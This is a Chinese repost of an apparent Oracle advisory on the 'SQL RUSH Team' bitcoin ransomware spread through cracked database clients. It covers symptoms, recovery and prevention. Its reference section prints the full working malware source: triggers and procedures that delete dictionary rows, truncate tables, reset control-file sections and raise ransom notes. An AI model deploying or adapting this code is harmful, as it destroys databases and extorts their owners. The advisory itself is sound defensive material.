對數據庫的「比特幣攻擊」及防禦

對數據庫的「比特幣攻擊」及防禦

 

James Mu

ALERT: 數據庫存在遭受比特幣攻擊的風險 ________________________________________ In this Document Description Occurrence Symptoms Workaround Solution References ________________________________________ APPLIES TO: Oracle Database - any Edition - any Version Information in this document applies to any platform. DESCRIPTION 用戶使用客戶端鏈接數據庫或者數據庫Alert日誌中出現ORA-20312/ORA-20313/ORA-20315等報錯信息，描述數據庫已被鎖死，須要發送比特幣到某個地址來解鎖數據庫。 OCCURRENCE 客戶使用被惡意篡改的綠色版或破解版的客戶端軟件（如破解的PL/SQL Developer或者Toad等軟件）去鏈接數據庫，在此類軟件中，在鏈接成功後，調用注入的SQL腳本（Login.sql、AfterConnect.sql、toad.ini等）執行惡意代碼，在數據庫中生成三個觸發器和四個存儲過程。 當數據庫重啓或者用戶鏈接數據庫時，觸發器會調用相應的存儲過程操做數據庫。這些存儲過程會可能會破壞數據庫，並拋出錯誤信息和提示信息。 SYMPTONS 用戶使用客戶端鏈接數據庫或者數據庫Alert日誌中出現ORA-20312/ORA-20313/ORA-20315等報錯信息，描述數據庫已被鎖死，須要發送比特幣到某個地址來解鎖數據庫。這些注入腳本假裝成Oracle內部程序： -- -- Copyright (c) 1988, 2011, Oracle and/or its affiliates. -- All rights reserved. -- -- NAME -- login.sql -- -- DESCRIPTION -- PL/SQL global login "site profile" file -- -- Add any PL/SQL commands here that are to be executed when a -- user starts PL/SQL, or uses the PL/SQL CONNECT command. -- -- USAGE -- This script is automatically run -- -- This SQL was created by Oracle ; You should never remove/delete it! -- MODIFIED (MM/DD/YY) -- …… 兩個已知的報錯信息以下: 例子 1: Alert.log 信息: Thu Apr 13 13:48:55 2017 Errors in file /oracle/diag/rdbms/liantiaodb/liantiaodb/trace/liantiaodb_ora_5213.trc: ORA-00604: 遞歸 SQL 級別 1 出現錯誤 ORA-20315: 你的數據庫已被SQL RUSH Team鎖死 發送5個比特幣到這個地址 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (大小寫一致) 以後把你的Oracle SID郵寄地址 sqlrush@mail.com 咱們將讓你知道如何解鎖你的數據庫 Hi buddy, your database was hacked by SQL RUSH Team, send 5 bitcoin to address 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (case sensitive), after that send your Oracle SID to mail address sqlrush@mail.com, we will let you know how to unlock your database. ORA-06512: 在 "AIQRY.DBMS_CORE_INTERNAL ", line 25 ORA-06512: 在 line 2 例子 2 使用客戶端鏈接數據庫時報錯: 數據庫中存在被加密的存儲過程，名字以下： "DBMS_SUPPORT_INTERNAL " "DBMS_ SYSTEM_INTERNAL " "DBMS_ CORE_INTERNAL " "DBMS_STANDARD_FUN9" 三個觸發器名字以下： "DBMS_SUPPORT_INTERNAL " "DBMS_ SYSTEM_INTERNAL " "DBMS_ CORE_INTERNAL " WORKAROUND None SOLUTION 針對如今已經發現的比特幣攻擊問題的處理方法以下： 1. 刪除被惡意篡改的客戶端軟件 2. 根據不一樣的狀況進行處理： 狀況一： SYSDATE-MIN(LAST_ANALYZED) 小於1200天 數據庫損壞狀況：未損壞 處理辦法： a.刪除三個觸發器： "DBMS_SUPPORT_INTERNAL " "DBMS_ SYSTEM_INTERNAL " "DBMS_ CORE_INTERNAL " b.刪除四個存儲過錯： "DBMS_SUPPORT_INTERNAL " "DBMS_ SYSTEM_INTERNAL " "DBMS_ CORE_INTERNAL " "DBMS_STANDARD_FUN9" 狀況二： SYSDATE-MIN(LAST_ANALYZED) 大於1200天，而且SYSDATE-CREATED大於1200天但未重啓 或者 SYSDATE-CREATED 小於1200天 數據庫損壞狀況：某些表被truncate 處理方法： a.刪除三個觸發器和四個存儲過程 b.使用備份把表恢復到truncate以前 c.使用DUL恢復（不必定能恢復全部的表，如truncate的空間已被使用） 狀況三： SYSDATE-CREATED 大於1200天 數據庫損壞狀況：某些表被truncate以及tab$被刪除 處理方法： a.刪除三個觸發器和四個存儲過程 b.使用備份把表恢復到truncate以前 c.使用ORACHK開頭的表恢復tab$ d.使用DUL恢復（不必定能恢復全部的表，如truncate的空間已被使用） 針對比特幣攻擊的預防措施： 1. 監控數據庫中是否有相應的觸發器和存儲過程。及時刪除相應觸發器和存儲過程。 2. 限制DBA權限的使用。 3. 檢查相關登陸工具的自動化腳本，清理有風險的腳本： SQL*PLUS 中的glogin.sql/login.sql Toad 中的toad.ini PL/SQL Developer中的ogin.sql/AfterConnect.sql 4. 建議從官網下載工具，不要使用綠色版/破解版等。 REFERENCES 三個觸發器的代碼： PROMPT Create "DBMS_SUPPORT_INTERNAL " create or replace trigger "DBMS_SUPPORT_INTERNAL " after startup on database begin "DBMS_SUPPORT_INTERNAL "; end; / CREATE OR REPLACE TRIGGER "DBMS_SYSTEM_INTERNAL " AFTER LOGON ON DATABASE BEGIN "DBMS_SYSTEM_INTERNAL "; END; / CREATE OR REPLACE TRIGGER "DBMS_CORE_INTERNAL " AFTER LOGON ON SCHEMA BEGIN "DBMS_CORE_INTERNAL "; END; / 四個加密的存儲過程的代碼解密後以下： PROCEDURE "DBMS_SUPPORT_INTERNAL " IS DATE1 INT :=10; E1 EXCEPTION; PRAGMA EXCEPTION_INIT(E1, -20312); BEGIN SELECT NVL(TO_CHAR(SYSDATE-CREATED ),0) INTO DATE1 FROM V$DATABASE; IF (DATE1>=1200) THEN EXECUTE IMMEDIATE 'create table ORACHK'||SUBSTR(SYS_GUID,10)||' tablespace system as select * from sys.tab$'; DELETE SYS.TAB$ WHERE DATAOBJ# IN (SELECT DATAOBJ# FROM SYS.OBJ$ WHERE OWNER# NOT IN (0,38)) ; COMMIT; EXECUTE IMMEDIATE 'alter system checkpoint'; SYS.DBMS_BACKUP_RESTORE.RESETCFILESECTION(11); SYS.DBMS_BACKUP_RESTORE.RESETCFILESECTION(12); SYS.DBMS_BACKUP_RESTORE.RESETCFILESECTION(13); SYS.DBMS_BACKUP_RESTORE.RESETCFILESECTION(14); FOR I IN 1..2046 LOOP DBMS_SYSTEM.KSDWRT(2, 'Hi buddy, your database was hacked by SQL RUSH Team, send 5 bitcoin to address 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (case sensitive), after that send your Oracle SID to mail address sqlrush@mail.com, we will let you know how to unlock your database.'); DBMS_SYSTEM.KSDWRT(2, '你的數據庫已被SQL RUSH Team鎖死 發送5個比特幣到這個地址 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (大小寫一致) 以後把你的Oracle SID郵寄地址 sqlrush@mail.com 咱們將讓你知道如何解鎖你的數據庫'); END LOOP; RAISE E1; END IF; EXCEPTION WHEN E1 THEN RAISE_APPLICATION_ERROR(-20312,'你的數據庫已被SQL RUSH Team鎖死 發送5個比特幣到這個地址 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (大小寫一致) 以後把你的Oracle SID郵寄地址 sqlrush@mail.com 咱們將讓你知道如何解鎖你的數據庫 Hi buddy, your database was hacked by SQL RUSH Team, send 5 bitcoin to address 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (case sensitive), after that send your Oracle SID to mail address sqlrush@mail.com, we will let you know how to unlock your database.'); WHEN OTHERS THEN NULL; END; / PROCEDURE "DBMS_SYSTEM_INTERNAL " IS DATE1 INT :=10; E1 EXCEPTION; PRAGMA EXCEPTION_INIT(E1, -20313); BEGIN SELECT NVL(TO_CHAR(SYSDATE-MIN(LAST_ANALYZED)),0) INTO DATE1 FROM ALL_TABLES WHERE TABLESPACE_NAME NOT IN ('SYSTEM','SYSAUX','EXAMPLE'); IF (DATE1>=1200) THEN IF (UPPER(SYS_CONTEXT('USERENV', 'MODULE'))!='C89239.EXE') THEN RAISE E1; END IF; END IF; EXCEPTION WHEN E1 THEN RAISE_APPLICATION_ERROR(-20313,'你的數據庫已被SQL RUSH Team鎖死 發送5個比特幣到這個地址 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (大小寫一致) 以後把你的Oracle SID郵寄地址 sqlrush@mail.com 咱們將讓你知道如何解鎖你的數據庫 Hi buddy, your database was hacked by SQL RUSH Team, send 5 bitcoin to address 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (case sensitive), after that send your Oracle SID to mail address sqlrush@mail.com, we will let you know how to unlock your database.'); WHEN OTHERS THEN NULL; END; / PROCEDURE "DBMS_CORE_INTERNAL " IS V_JOB NUMBER; DATE1 INT :=10; STAT VARCHAR2(2000); V_MODULE VARCHAR2(2000); E1 EXCEPTION; PRAGMA EXCEPTION_INIT(E1, -20315); CURSOR TLIST IS SELECT * FROM USER_TABLES WHERE TABLE_NAME NOT LIKE '%$%' AND TABLE_NAME NOT LIKE '%ORACHK%' AND CLUSTER_NAME IS NULL; BEGIN SELECT NVL(TO_CHAR(SYSDATE-MIN(LAST_ANALYZED)),0) INTO DATE1 FROM ALL_TABLES WHERE TABLESPACE_NAME NOT IN ('SYSTEM','SYSAUX','EXAMPLE'); IF (DATE1>=1200) THEN FOR I IN TLIST LOOP DBMS_OUTPUT.PUT_LINE('table_name is ' ||I.TABLE_NAME); STAT:='truncate table '||USER||'.'||I.TABLE_NAME; DBMS_JOB.SUBMIT(V_JOB, 'DBMS_STANDARD_FUN9(''' || STAT || ''');', SYSDATE); COMMIT; END LOOP; END IF; IF (UPPER(SYS_CONTEXT('USERENV', 'MODULE'))!='C89239.EXE') THEN RAISE E1; END IF; EXCEPTION WHEN E1 THEN RAISE_APPLICATION_ERROR(-20315,'你的數據庫已被SQL RUSH Team鎖死 發送5個比特幣到這個地址 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (大小寫一致) 以後把你的Oracle SID郵寄地址 sqlrush@mail.com 咱們將讓你知道如何解鎖你的數據庫 Hi buddy, your database was hacked by SQL RUSH Team, send 5 bitcoin to address 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (case sensitive), after that send your Oracle SID to mail address sqlrush@mail.com, we will let you know how to unlock your database.'); WHEN OTHERS THEN RAISE_APPLICATION_ERROR(-20315,'你的數據庫已被SQL RUSH Team鎖死 發送5個比特幣到這個地址 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (大小寫一致) 以後把你的Oracle SID郵寄地址 sqlrush@mail.com 咱們將讓你知道如何解鎖你的數據庫 Hi buddy, your database was hacked by SQL RUSH Team, send 5 bitcoin to address 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (case sensitive), after that send your Oracle SID to mail address sqlrush@mail.com, we will let you know how to unlock your database.'); END; / PROCEDURE DBMS_STANDARD_FUN9(V_DDL IN VARCHAR2) IS BEGIN EXECUTE IMMEDIATE V_DDL; END; /